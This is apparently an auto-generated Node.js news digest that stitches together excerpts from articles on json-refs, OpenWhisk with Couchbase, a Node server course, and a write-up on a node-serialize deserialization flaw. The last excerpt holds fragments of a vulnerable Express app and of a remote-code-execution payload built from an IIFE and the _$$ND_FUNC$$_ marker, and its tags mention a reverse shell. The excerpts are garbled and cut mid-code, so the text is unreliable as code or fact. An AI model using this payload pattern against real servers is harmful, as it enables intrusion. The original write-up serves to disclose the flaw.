Your Choice JavaScript News

Node News Monday, February 12

Node News TLDR / Table of Contents

  • whitlockjc/json-refs
    • json-refs – Various utilities for JSON Pointers (http://tools.ietf.org/html/rfc6901) and JSON References (http://tools.ietf.org/html/draft-pbryan-zyp-json-ref-03).
    • issue, references, remote references, circular references,
  • The Most Popular Node.js Tutorials of 2017 | @RisingStack
    • It’s time to close 2017; with this article, we look back on the past year with the best articles of the RisingStack blog. Stay tuned for more in 2018!
    • Node.js, Node.js REST APIs, Node.js application, node.js package managers, new Node features
  • Use OpenWhisk for FaaS with Node.js and Couchbase NoSQL
    • Learn how to create and deploy highly scalable applications as functions using OpenWhisk on Bluemix for FaaS and Couchbase for NoSQL JSON data.
    • function, functions, data, command line, OpenWhisk
  • Node.js: Full application example
    • In this course, you will get introduced to Node.js. You will learn how to install, configure and run the server and how to load various modules.
    • ejs, server, file, data, code
  • Exploiting Node.js deserialization bug for Remote Code Execution
    • tl;dr Untrusted data passed into unserialize() function  in node-serialize module can be exploited to achieve arbitrary code execution by passing a serialized JavaScript Object with an Immediately invoked function expression (IIFE). The Bug During a Node.
    • function, code execution, reverse shell, ,
  • Permalink – – – – – – – – – Fetching contributors… – – – – – Cannot retrieve contributors at this time – – – – – – – – – 263 lines (178 sloc) – – 12.1 KB – – – – – – Release Notes – v3.0.4…
  • It also means if your reference is escaped, like #/definitions/My%20Pet, it – will also work as expected.)
  • (Issue #61) – Fix an issue with combining options.filter and options.includeInvalid (Issue #63) – We now clone the JSON Reference definition and JSON Reference details respectively for options.refPreProcessor’ andoptions.refPostProcessor` (Issue #64) – – v2.0.4 (2016-01-21) – – Fixed a bug where a reference to another object that shares a common…
  • Added #resolveRefsAt to allow you to retrieve a remote document and then resolve its references – Fixed a bug where Windows paths containing \ were not processed properly (Issue #48) – Removed #resolveLocalRefs – Renamed #isJsonPointer to #isPtr – Renamed #isJsonReference to #isRef – Renamed #pathFromPointer to #pathFromPtr – Renamed…

Tags: issue, references, remote references, circular references,

  • In this article we had explored using Amazons Serverless services to create Lambda functions that interact with Couchbase, our NoSQL database.
  • Were going to see how to create serverless functions using OpenWhisk to communicate with our Couchbase Server database.
  • js file and include the following JavaScript code: – – Youre probably seeing the bigger picture now in regards to function creation with OpenWhisk and Couchbase, so were not going to walk through the above function for deleting documents.
  • If youre on a Mac or computer with a ZIP CLI, execute the following: – – When you have a ZIP of each function, they can be deployed by executing the following: – – I introduced some new things in the above command.
  • You just saw how to create a package of serverless functions for OpenWhisk that communicate with the NoSQL database, Couchbase.

Tags: function, functions, data, command line, OpenWhisk

  • Unlike traditional web servers, there is no separation between the web server and our code and we do not have to customize external configuration files (XML or Property Files) to get the Node.js Web Server up.
  • In the node.js platform, we start up the server as follows: – – Lets now discuss the different features in server.js: – – Here is a code snippet with which we store the file in the cache store: – – Here is a code snippet with which we serve the…
  • The next time any client requests the file, we check that we have the file stored in the cache object and will retrieve an object containing the cached data.
  • For better performance, we should stream file from disk and then pipe it directly to the response object, sending data to the network socket one piece at a time.
  • On top of that we have implemented error handling with the following piece of code: – – Now the or method enables us to take our file from the disk and stream it directly to the socket through the standard response object.

Tags: ejs, server, file, data, code

  • tl;dr – Untrusted datapassed intounserialize() function in node-serialize module can be exploited to achievearbitrarycode executionby passing a serialized JavaScript Object with anImmediately invoked function expression (IIFE).
  • Here is a sample node.js application to imitate the code: – – – var express = require(‘express’); – var cookieParser = require(‘cookie-parser’); – var escape = require(‘escape-html’); – var serialize = require(‘node-serialize’); – var app = function(req, res) { – if (req.cookies.profile) { – var str = new Buffer(req.cookies.profile, ‘base64’)….
  • var y = { – rce : /’, function(error, stdout, stderr) { console.log(stdout) }); – }(), – } – var serialize = \n + serialize.serialize(y)); – – The following output was obtained – – – – The IIFE worked fine but the serialization failed.
  • So we have the exploit (){\n \t /’, – function(error, stdout, stderr) { console.log(stdout) });\n }()} – Passing it to unserialize() function will result in code execution.
  • var serialize = require(‘node-serialize’); – var payload = ‘{rce:_$$ND_FUNC$$_function /\’, function(error, stdout, stderr) { console.log(stdout) we know that we can exploit unserialize()function in node-serialize module, if untrusted data passed into it.

Tags: function, code execution, reverse shell, ,

The Complete Node.js Developer Course (2nd Edition) (60,232 students enrolled)

By Andrew Mead
  • Build, test, and launch Node apps
  • Create Express web servers and APIs
  • Store data with Mongoose and MongoDB
  • Use cutting-edge ES6/ES7 JavaScript
  • Deploy your Node apps to production
  • Create real-time web apps with SocketIO

Learn more.


Angular (Angular 2+) & NodeJS - The MEAN Stack Guide (26,806 students enrolled)

By Maximilian Schwarzmüller
  • Build real Angular + NodeJS applications
  • Understand how Angular works and how it interacts with Backends
  • Connect any Angular Frontend with a NodeJS Backend
  • Use MongoDB with Mongoose to interact with Data on the Backend
  • Use ExpressJS as a NodeJS Framework
  • Provide a great user experience by using Optimistic Updating on the Frontend
  • Improve any Angular (+ NodeJS) application by adding Error Handling

Learn more.


Comments are closed, but trackbacks and pingbacks are open.